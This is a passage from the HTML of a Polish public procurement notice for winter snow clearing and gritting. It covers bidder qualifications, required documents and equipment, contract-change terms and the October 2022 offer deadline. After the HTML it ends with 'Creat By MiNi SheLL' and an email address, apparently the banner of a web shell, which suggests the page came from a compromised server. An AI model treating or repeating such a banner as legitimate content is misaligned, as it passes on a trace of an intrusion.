109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca musi spełniać warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej, Wykonawca spełni warunek, jeżeli<br/>wykaże, że:<br/>a) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym<br/>okresie, należycie wykonał lub wykonuje co najmniej jedno zamówienie polegające na wykonaniu usługi w ramach<br/>zimowego utrzymania tj.: odśnieżania lub likwidacji śliskości zimowej na drogach publicznych, chodnikach, parkingach lub<br/>ciągach pieszych, o powierzchni nie mniejszej niż 8.000 m2;<br/>b) dysponuje co najmniej jednym pojazdem typu ciągnik lub innym pojazdem mechanicznym przystosowanym do<br/>wykonywania prac związanych z przedmiotem zamówienia:<br/>b.1. wyposażonym w pług - przystosowanym do odśnieżania chodników, ciągów pieszych, parkingów, dróg wewnętrznych, z<br/>aktualnymi badaniami technicznymi oraz ubezpieczeniem OC,<br/>b.2. wyposażonym w piaskarkę - z aktualnymi badaniami technicznymi oraz ubezpieczeniem OC,<br/>Warunek zostanie spełniony, także wtedy, gdy zamiast jednego pojazdu mechanicznego wyposażonego w pług oraz<br/>piaskarkę, o którym mowa powyżej, Wykonawca dysponuje jednym pojazdem mechanicznym wyposażonym w pług oraz<br/>jednym pojazdem mechanicznym wyposażonym w piaskarkę, z aktualnymi badaniami technicznymi oraz ubezpieczeniem<br/>OC. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5) ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną<br/>ofertę w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy<br/>kapitałowej – według wzoru stanowiącego Załącznik nr 4 do SWZ; 2)Odpis lub informacja z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4) Ustawy, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; 3)Oświadczenie Wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy - według wzoru stanowiącego załącznik nr<br/>8 do SWZ, w zakresie podstaw wykluczenia z postępowania:<br/>a) na podstawie art. 108 ust. 1 Ustawy oraz art. 109 ust. 1 pkt. 7) i 8) Ustawy,<br/>b) na podstawie art. 7 ust. 1 pkt. 1-3 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)Wykaz usług - według wzoru stanowiącego Załącznik nr 7 do SWZ, wykonanych, a w przypadku świadczeń powtarzających się lub<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz<br/>z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane,<br/>oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, co najmniej jedno<br/>zamówienie polegające na wykonaniu usługi w ramach zimowego utrzymania tj.: odśnieżania lub likwidacji śliskości zimowej na<br/>drogach publicznych, chodnikach, parkingach lub ciągach pieszych, o powierzchni nie mniejszej niż 8.000 m2;<br/>2) Dowody określające czy usługi wymienione w wykazie usług, o którym mowa w pkt. 1) zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są:<br/>a) referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, lub,<br/>b) referencje bądź inne dokumenty wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w przypadku usług<br/>nadal wykonywanych, lub<br/>c) oświadczenie wykonawcy, jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać dokumentów, o których<br/>mowa w lit. a) lub b).<br/>3) Wykaz sprzętu niezbędnego do wykonania zamówienia, którymi dysponuje lub będzie dysponował Wykonawca w celu wykonania<br/>zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (według wzoru stanowiącego Załącznik nr<br/>9 do SWZ), w tym obejmujący:<br/>a) co najmniej jeden pojazd typu ciągnik lub inny pojazd mechaniczny wyposażony w pług i piaskarkę, albo<br/>b) co najmniej jeden pojazd typu ciągnik lub inny pojazd mechaniczny wyposażony w pług przystosowany do odśnieżania<br/>chodników, ciągów pieszych, parkingów, dróg wewnętrznych, z aktualnymi badaniami technicznymi oraz ubezpieczeniem OC oraz<br/>co najmniej jeden pojazd typu ciągnik lub inny pojazd mechaniczny wyposażony w piaskarkę z aktualnymi badaniami technicznymi<br/>oraz ubezpieczeniem OC;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych na podstawie art. 7 ust. 1 pkt. 1-3 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835).<br/>2. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert: Oświadczenie Wykonawcy o braku podstaw wykluczenia z postępowania na podstawie art. 7 ust. 1 pkt. 1-3 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835) – zgodnie z Załącznikiem nr 2A do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. Spółki cywilne, Konsorcja) znajdują<br/>się w Rozdziale nr 10 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje, że wprowadzenie zmian do zawartej umowy możliwe będzie w przypadkach określonych w art.<br/>454 i art. 455 Ustawy, w sytuacjach, gdy Zamawiający uzna, że zmiany te są niezbędne celem zapewnienia prawidłowego<br/>wykonania umowy przez strony, w szczególności w następujących przypadkach:<br/>1) omyłek pisarskich lub błędów rachunkowych,<br/>2) mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między<br/>stronami,<br/>3) konieczności zmiany sposobu wykonywania lub zakresu zamówienia z przyczyn wcześniej nie przewidzianych,<br/>4) rezygnacji przez Zamawiającego z odśnieżania obiektu objętego przedmiotem umowy w przypadku jego wydzierżawienia/<br/>wynajmu lub utraty przez Zamawiającego prawa do jego administrowania, zarządzania,<br/>5) jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,<br/>6) zmiany cen brutto w związku ze zmianą obowiązujących stawek podatku od towarów i usług,<br/>7) zmiany terminu, sposobu lub zakresu zamówienia w przypadkach i w trybie określonym w art.15r ustawy z dn. 02.03.2020<br/>o szczególnych rozwiązaniach z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych<br/>oraz wywołanych nimi sytuacji kryzysowych jeżeli przepis ten będzie obowiązywał;<br/>8) zmiany terminu, sposobu lub zakresu zamówienia w przypadku zamknięcia szkoły i przejścia w zdalny tryb nauczania,<br/>9) zmiany albo rezygnacji z podwykonawcy z tym zastrzeżeniem, iż jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy<br/>podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 Ustawy, w celu<br/>wykazania spełniania warunków udziału w postępowaniu lub kryteriów selekcji, Wykonawca jest obowiązany wykazać<br/>Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż<br/>podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-19 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/672068</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-19 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com